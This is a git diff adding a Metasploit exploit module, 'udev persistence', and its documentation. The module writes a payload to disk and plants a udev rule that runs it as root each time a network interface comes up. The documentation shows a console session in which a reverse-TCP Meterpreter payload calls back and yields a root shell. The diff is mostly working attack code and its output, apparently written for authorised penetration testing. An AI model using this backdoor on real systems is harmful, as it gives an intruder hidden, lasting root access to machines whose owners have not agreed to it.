diff --git a/documentation/modules/exploit/linux/local/udev_persistence.md b/documentation/modules/exploit/linux/local/udev_persistence.md new file mode 100644 index 0000000000000..15231284764c6 --- /dev/null +++ b/documentation/modules/exploit/linux/local/udev_persistence.md @@ -0,0 +1,43 @@ +This is a post module that performs a persistence installation on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev). +The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up. + +## Verification Steps + + 1. Start msfconsole + 2. Obtain a session on the target machine + 3. `use exploit/linux/local/udev_persistence` + 4. `set session -1` + 5. `exploit` + +## Module usage + +``` +msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(linux/local/udev_persistence) > set session -1 +session => -1 +msf6 exploit(linux/local/udev_persistence) > exploit + +[*] /usr/bin/udev-check-updates written +[*] /lib/udev/rules.d/99-update.rules written +msf6 exploit(linux/local/udev_persistence) > +[*] Sending stage (3045380 bytes) to 172.18.49.39 +[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400 +msf6 exploit(linux/local/udev_persistence) > sessions -i -1 +[*] Starting interaction with 2... + +meterpreter > getuid +Server username: root +meterpreter > +``` + +## Options + +### BACKDOOR_PATH + +Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules) + +### PAYLOAD_PATH + +Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates) + diff --git a/modules/exploits/linux/local/udev_persistence.rb b/modules/exploits/linux/local/udev_persistence.rb new file mode 100644 index 0000000000000..b3ee7085c8028 --- /dev/null +++ b/modules/exploits/linux/local/udev_persistence.rb @@ -0,0 +1,100 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Unix + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'udev persistence', + 'Description' => %q{ + This module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. + It'll be executed with root privileges everytime a network interface other than l0 comes up. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Julien Voisin' + ], + 'Platform' => [ 'unix', 'linux' ], + 'Arch' => ARCH_CMD, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'DefaultOptions' => { 'WfsDelay' => 90_000 }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '1999-01-01', + 'Passive' => true, + 'Stance' => Msf::Exploit::Stance::Passive, + 'Notes' => { + 'Stability' => [], + 'Reliability' => [EVENT_DEPENDENT], + 'SideEffects' => [ARTIFACTS_ON_DISK] + }, + 'References' => [ + ['URL', 'https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp'], + ['URL', 'https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/'], + ] + ) + ) + register_options([ + + OptString.new('PAYLOAD_PATH', [false, 'The payload\'s path on disk', '']), + OptString.new('BACKDOOR_PATH', [false, 'The backdoor\'s path on disk', '']) + ]) + end + + def get_command + unless executable? '/usr/bin/at' + fail_with Failure::BadConfig, 'The required /usr/bin/at binary was not found on the target' + end + %(/usr/bin/at -M -f #{@payload_path} now) + end + + def exploit + @payload_path = datastore['PAYLOAD_PATH'].blank? ? '/usr/bin/' + Rex::Text.rand_text_alphanumeric(8) : datastore['PAYLOAD_PATH'] + + @backdoor_path = datastore['BACKDOOR_PATH'].blank? ? '/lib/udev/rules.d/' + Rex::Text.rand_text_alphanumeric(8) + '.rules' : datastore['BACKDOOR_PATH'] + + unless writable? File.dirname(@backdoor_path) + fail_with Failure::BadConfig, "#{@backdoor_path} is not writable" + end + + if exists? @backdoor_path + fail_with Failure::BadConfig, "#{@backdoor_path} is already present" + end + + unless writable? File.dirname(@payload_path) + fail_with Failure::BadConfig, "#{@payload_path} is not writable" + end + + if exists? @payload_path + fail_with Failure::BadConfig, "#{@payload_path} is already present" + end + + upload_and_chmodx(@payload_path, "#!/bin/sh\n#{payload.encoded}") + print_status "#{@payload_path} written" + + fail_with Failure::PayloadFailed, 'Failed to write UDEV file' unless write_file(@backdoor_path, %(SUBSYSTEM=="net", KERNEL!="lo", RUN+="#{get_command}")) + + print_status "#{@backdoor_path} written" + + # need to trigger first rule manually + print_status 'Triggering udev rule' + cmd_exec('udevadm trigger -v --subsystem-match=net') + + stime = Time.now.to_f + timeout = datastore['ListenerTimeout'].to_i + loop do + break if timeout > 0 && (stime + timeout < Time.now.to_f) + + Rex::ThreadSafe.sleep(1) + end + end +end